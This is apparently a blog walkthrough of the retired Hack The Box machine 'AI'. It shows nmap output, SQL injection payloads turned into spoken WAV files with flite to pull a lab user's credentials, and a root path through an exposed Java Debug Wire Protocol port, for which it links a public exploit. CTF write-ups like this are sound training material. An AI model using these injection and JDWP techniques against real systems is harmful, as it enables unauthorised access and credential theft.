Hey guys.AI from Hack The Box was retired today and here is my write up about it. 

Quick Summary 

AI is a linux medium machine and the ip adress is 10.10.10.163.It is really fun machine. 

For the user path it is about wav file access on web server,use sql injection to get the credential from database and loggind into ssh. 

For priv Java Debug portoco Tomcat running as root and exploit it.So let’s get jump in. 

Nmap 

As always we start with nmap to scan for open port and services. 

“` 

root@ch4n:~# nmap -sC -sV 10.10.10.163 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:25 EST 

Nmap scan report for 10.10.10.163 

Host is up (0.25s latency). 

Not shown: 998 closed ports 

PORT   STATE SERVICE VERSION 

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 

| ssh-hostkey: 

|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA) 

|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA) 

|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519) 

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)) 

|_http-server-header: Apache/2.4.29 (Ubuntu) 

|_http-title: Hello AI! 

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds 

“` 

In our nmap scan there are two open ports.SSH is running on port 22 and http is running on port 80. 

Nothing was interesting on nmap let’s check the web page. 

Web Page 

After playing around on web page found the ai.php. 

It said drop you query using wav file. 

So in here we need to upload wav file. 

I wanna explain something about convertion of text to wav file in here. 

At first I used an online tool https://www.text2speech.org/ but it is not work for the long sentence. 

The AI can’t understand so I split the voice in audacity for the long sentence it is annoying to do. 

So I look for the better tools called flite. 

It mention about query in web page.I think about it may be voice sql injection.Actually I didn’t expect that but it was really fun. 

So I test like 

“` 

open single quote 

“` 

Turn to wav file 

“` 

flite -o open-single-quote.wav -t “open single quote” -voice rms 

“` 

here we got the sql injection error. 

Let’s pull the creds:-) 

I used some commas and spaces to speak slowly. 

“` 

root@ch4n:~/Desktop/htb/boxes/AI# flite -o user.wav -t “open single quote, union, select, username, from, users, comment, database” -voice rms 

“` 

here we got the username as 

“` 

alexa 

“` 

Do the same thing for the password:-) 

“` 

root@ch4n:~/Desktop/htb/boxes/AI# flite -o pass.wav -t “open single quote, union, select, password, from, users, comment, database” -voice rms 

“` 

Here we got the password as 

“` 

H,Sq9t6}a<)?q93_ 

“` 

I just login to ssh and grab the user flag 

Privilleges Escalation 

I just run the pspy and found the java debug file is running 

“` 

2019/11/10 17:52:03 CMD: UID=0    PID=14442  | /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start 

2019/11/10 17:52:07 CMD: UID=1000 PID=14465  | sudo -u mrr3boot vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash 

2019/11/10 17:52:07 CMD: UID=4000000000 PID=14466  | vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash 

“` 

After googling about jdwp exploit,found the exploit and wonderful article 

https://ioactive.com/hacking-java-debug-wire-protocol-or-how/

https://www.exploit-db.com/exploits/46501

After reading the exploit 

I run the exxploit and garb the root flag 

That’s it guys. 

Hope you enjoy my write up:-) 

Don’t forget to check other write up on my blog. 

<script src=”https://www.hackthebox.eu/badge/81292″></script> 

Author

CH4N